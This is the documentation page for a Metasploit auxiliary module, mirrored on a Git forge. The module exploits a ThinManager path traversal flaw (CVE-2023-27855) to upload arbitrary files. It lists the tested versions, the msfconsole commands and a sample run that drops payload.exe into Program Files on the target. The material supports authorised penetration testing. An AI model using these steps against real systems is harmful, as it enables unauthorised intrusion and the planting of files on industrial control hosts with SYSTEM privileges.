adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/auxiliary/admin/networking/thinmanager_traversal_upload.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.3 KiB
Raw Blame History

Vulnerable Application

This module exploits a path traversal vulnerability in ThinManager <= v13.0.1 (CVE-2023-27855) to upload an arbitrary file to the target system.

The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.

Testing

The software can be obtained from the vendor.

Successfully tested on

  • ThinManager v13.0.1 on Windows 22H2
  • ThinManager v13.0.0 on Windows 22H2
  • ThinManager v12.1.5 on Windows 22H2
  • ThinManager v10.0.2 on Windows 22H2

Verification Steps

  1. Install and run the application
  2. Start msfconsole and run the following commands:
msf > use auxiliary/admin/networking/thinmanager_traversal_upload 
msf auxiliary(admin/networking/thinmanager_traversal_upload) > set RHOSTS <IP>
msf auxiliary(admin/networking/thinmanager_traversal_upload) > set LFILE <local file location>
msf auxiliary(admin/networking/thinmanager_traversal_upload) > set RFILE <remote file location>
msf auxiliary(admin/networking/thinmanager_traversal_upload) > run

This should upload the local file specified through LFILE to the server, as specified in RFILE.

Options

LFILE

Specifies the local file to upload to the remote server.

RFILE

Specifies the remote file location where the file will be uploaded to.

Scenarios

Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:

msf auxiliary(admin/networking/thinmanager_traversal_upload) > run
[*] Running module against 192.168.137.227

[*] 192.168.137.227:2031 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.137.227:2031 - The service is running, but could not be validated.
[*] 192.168.137.227:2031 - Sending handshake...
[*] 192.168.137.227:2031 - Received handshake response.
[*] 192.168.137.227:2031 - Read 27648 bytes from /tmp/payload.exe
[*] 192.168.137.227:2031 - Uploading /tmp/payload.exe as /Program Files/Rockwell Software/ThinManager/payload.exe on the remote host...
[*] 192.168.137.227:2031 - Upload request length: 27752 bytes
[!] 192.168.137.227:2031 - No response received after upload.
[+] 192.168.137.227:2031 - Upload process completed. Check if '/Program Files/Rockwell Software/ThinManager/payload.exe' exists on the target.
[*] Auxiliary module execution completed
Reference in New Issue View Git Blame Copy Permalink